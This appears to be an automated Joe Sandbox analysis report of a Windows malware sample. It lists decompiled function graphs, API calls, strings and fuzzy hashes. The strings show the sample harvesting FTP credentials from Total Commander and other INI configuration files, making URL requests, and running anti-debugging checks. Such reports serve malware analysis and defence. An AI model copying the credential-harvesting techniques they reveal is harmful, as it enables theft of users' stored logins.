                                                                                                                                                                                                                • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CharLower$CommandFileLineModuleName
                                                                                                                                                                                                                • String ID: /nomove
                                                                                                                                                                                                                • API String ID: 1338073227-1111986840
                                                                                                                                                                                                                • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                                • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 96 407727-407751 call 40d5b0 GetModuleFileNameW 99 407753-40776b call 4075d4 96->99 100 40776d-40776e 96->100 105 4077e1-4077ea 99->105 102 407774-407797 ExpandEnvironmentStringsW call 4075d4 100->102 106 40779c-4077a0 102->106 107 4077a2-4077a5 106->107 108 4077eb-4077ee 106->108 110 4077b7-4077ba 107->110 111 4077a7-4077b5 GetLastError 107->111 109 4077e0 108->109 109->105 113 4077d2-4077dc 110->113 114 4077bc-4077c8 GetLastError 110->114 112 4077ca-4077cf call 40a786 111->112 112->113 113->102 116 4077de 113->116 114->112 116->109
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,76230900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 004077A9
                                                                                                                                                                                                                  • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                                  • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1536607067-0
                                                                                                                                                                                                                • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                                                                                                                                                                                                                • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 118 4077f0-407829 call 40d530 CreateProcessW
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _memset.LIBCMT ref: 00407800
                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateProcess_memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1177741608-0
                                                                                                                                                                                                                • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                                • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 128 4069c0-4069fc RegQueryValueExW RegCloseKey
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                                • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 262 4039ea-403a14 HeapAlloc 263 403bba-403bbe 262->263 264 403a1a-403a30 GetPrivateProfileStringW 262->264 265 403bb3-403bb9 call 40be3a 264->265 266 403a36-403a42 call 40c475 264->266 265->263 266->265 271 403a48-403a5e HeapAlloc 266->271 271->265 272 403a64-403ac3 call 405511 * 5 271->272 283 403ac8-403ad7 StrStrIW 272->283 284 403b93-403ba3 call 40c495 283->284 285 403add-403aec StrStrIW 283->285 284->283 291 403ba9-403bb2 call 40be3a 284->291 285->284 286 403af2-403b03 GetPrivateProfileStringW 285->286 286->284 288 403b09-403b24 GetPrivateProfileStringW 286->288 288->284 290 403b26-403b3a GetPrivateProfileStringW 288->290 290->284 292 403b3c-403b47 call 403877 290->292 291->265 292->284 297 403b49-403b7b call 405511 call 40c3f9 292->297 302 403b90 297->302 303 403b7d-403b8b call 40c00b 297->303 302->284 303->302 306 403b8d 303->306 306->302
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PrivateProfileString$AllocHeap
                                                                                                                                                                                                                • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                                                                                                                                                                                                                • API String ID: 2479592106-2015850556
                                                                                                                                                                                                                • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                                • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                                                                                                                                                                                                                  • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 004032E5
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 004032ED
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(76990B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(76990B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                                                                                                                                                                                                                • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                                                                                                                                                                                                                • API String ID: 3066332896-2664446222
                                                                                                                                                                                                                • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                                • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00408342
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                                                                                                                                                                                                                • String ID: .$.$.8@$.8@$@@
                                                                                                                                                                                                                • API String ID: 2348139788-3828113974
                                                                                                                                                                                                                • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                                • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                                                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PrivateProfile$String$AllocHeap$CombinePath
                                                                                                                                                                                                                • String ID: ftp://%s:%s@%s:%u$pass$port$user
                                                                                                                                                                                                                • API String ID: 3432043379-2696999094
                                                                                                                                                                                                                • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                                • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,76230F00), ref: 00407043
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00407079
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004070BB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3711279109-0
                                                                                                                                                                                                                • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                                • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: &condition_id=$&kwtype=$&real_refer=%s$&ref=%s$&ref=%s&real_refer=%s$0$0$0$0
                                                                                                                                                                                                                • API String ID: 0-2992689389
                                                                                                                                                                                                                • Opcode ID: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
                                                                                                                                                                                                                • Instruction ID: e592e17ffd072e5ed7288f56bd6294cd549ee2c695a1c784d027d9705cc039a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F1E272810118AADB14EB61DC919EF737EEF01304F5044BBFA09B62D1E7789E858F99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3777474486-0
                                                                                                                                                                                                                • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                                • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 004072E3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                                • String ID: c{@
                                                                                                                                                                                                                • API String ID: 3735792614-264719814
                                                                                                                                                                                                                • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                                • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2579439406-0
